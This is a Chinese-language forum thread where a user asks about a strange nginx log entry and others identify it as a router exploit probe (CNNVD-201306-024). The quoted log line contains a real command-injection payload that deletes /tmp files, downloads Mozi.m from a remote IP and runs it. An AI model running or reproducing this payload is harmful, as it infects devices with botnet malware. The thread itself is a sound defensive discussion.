Yoo趣儿

Yoo趣儿 后端服务 服务器 nginx 莫名奇妙的日志,请大家分析一下。 ...

nginx 莫名奇妙的日志,请大家分析一下。

查看 39|回复 4
作者:调查员   
系统是刚装几天的,就装了 nginx 反代一个docker容器,不是80端口
但是nginx就老发现一些奇怪的日志。
比如下面这个。居然还有 “rm+-rf”  这种命令
117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=
rm+-rf
+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"

几天, 请大家, 日志

相关帖子

loverhoc   
别人在试漏洞,执行命令
调查员
OP
  

loverhoc 发表于 2024-9-8 12:26
别人在试漏洞,执行命令
不会吧,用访问不存在网页的方式,也能试漏洞?
wps   
这是一个针对路由器的漏洞CNNVD-201306-024
调查员
OP
  

wps 发表于 2024-9-8 12:30
这是一个针对路由器的漏洞CNNVD-201306-024
看来大家的路由器,80端口真的不要轻易打开。
返回列表
您需要登录后才可以回帖 登录 | 立即注册

AD1

热门主题

热门板块

问与答分享发现分享创造奇思妙想分享邀请码商业推广优惠信息PythonPHPJavaJavaScriptNode.jsGo语言C++HTML

公告

标签|小黑屋|Yoo趣儿

GMT+8, 2024-11-24 13:12 , Processed in 0.137232 second(s), 10 queries , Gzip On, MemCached On.

Powered by Discuz! X3.2

The happiest thing in the world is to strive for an ideal.

返回顶部